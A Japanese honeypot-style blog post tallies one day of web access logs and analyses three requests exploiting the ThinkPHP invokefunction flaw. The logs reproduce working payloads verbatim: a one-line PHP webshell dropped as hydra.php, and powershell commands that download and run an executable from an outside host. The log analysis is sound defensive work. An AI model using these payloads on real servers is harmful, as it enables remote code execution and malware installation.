結局昨日も前に書いたメール飛ばすscriptのメンテナンスに時間をとられてしまっていたorz
今日は無事に稼働していたので、もう大丈夫になったと信じたい・・
■2019-04-12のアクセス数は84件でした。
■送信元IPアドレスの数は 63件です。
■メソッドの一覧と件数は以下です。
| method | 総数 – method |
| CONNECT | 1 |
| GET | 82 |
| POST | 1 |
| 合計 結果 | 84 |
■アクセスパス一覧と件数は以下です。
| path | method | 総数 |
| / | GET | 61 |
| //vtigercrm/vtigerservice.php | GET | 2 |
| /ccvv | GET | 1 |
| /Main | GET | 1 |
| /myadmin/scripts/setup.php | GET | 2 |
| /mysql/scripts/setup.php | GET | 1 |
| /mysqlmanager/scripts/setup.php | GET | 1 |
| /phpmyadmin/ | GET | 2 |
| /phpMyAdmin/scripts/setup.php | GET | 1 |
| /phpmyadmin/scripts/setup.php/index.php | GET | 1 |
| /pma/scripts/setup.php | GET | 1 |
| /public/hydra.php?xcmd=cmd.exe%20/c%20 powershell%20(new-object%20System.Net.WebClient) .DownloadFile (‘http://fid.hognoob.se/download.exe’,’ C:/Windows/temp/ubhflqgunjzgqat2803.exe’); start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe | GET | 1 |
| /public/index.php?s=/index/\think\app/invokefunction &function=call_user_func_array&vars[0]=system&vars[1][]= echo%20^<?php%20$action%20=%20$_GET[‘xcmd’] | GET | 1 |
| /public/index.php?s=index/think\app/invokefunction& function=call_user_func_array&vars[0]=system &vars[1][]=cmd.exe%20/c%20powershell%20 (new-object%20System.Net.WebClient). DownloadFile(‘http://fid.hognoob.se/download.exe’, ‘C:/Windows/temp/ubhflqgunjzgqat2803.exe’);start%20 C:/Windows/temp/ubhflqgunjzgqat2803.exe | GET | 1 |
| /scripts/setup.php | GET | 1 |
| /tmUnblock.cgi | POST | 1 |
| /w00tw00t.at.blackhats.romanian.anti-sec:) | GET | 2 |
| www.google.com:443 | CONNECT | 1 |
| (空白) | GET | 2 |
気になるlog
-=-=54〜56件目のlog=-=-
#1つめ
[2019-04-12 14:15:02+0900]
GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: ほげ
#2つめ
[2019-04-12 14:15:02+0900]
GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: ほげ
#3つめ
[2019-04-12 14:15:02+0900]
GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start C:/Windows/temp/ubhflqgunjzgqat2803.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: ほげ
これらはthinkPHPの脆弱性をつく攻撃。よくセットでくるなぁと思っていたら、これらは相関関係があった。
1ひとつめの通信は脆弱性からcmdからpowershellを起動させマルウェアをダウンロード&実行している。
2つめの通信は脆弱性からhydra.phpを設置し、cmdを実行するwebshellを設置している
3つめの通信は単純に設置したhydra.phpをついてcmdからpowershellを起動させマルウェアをダウンロード&実行している。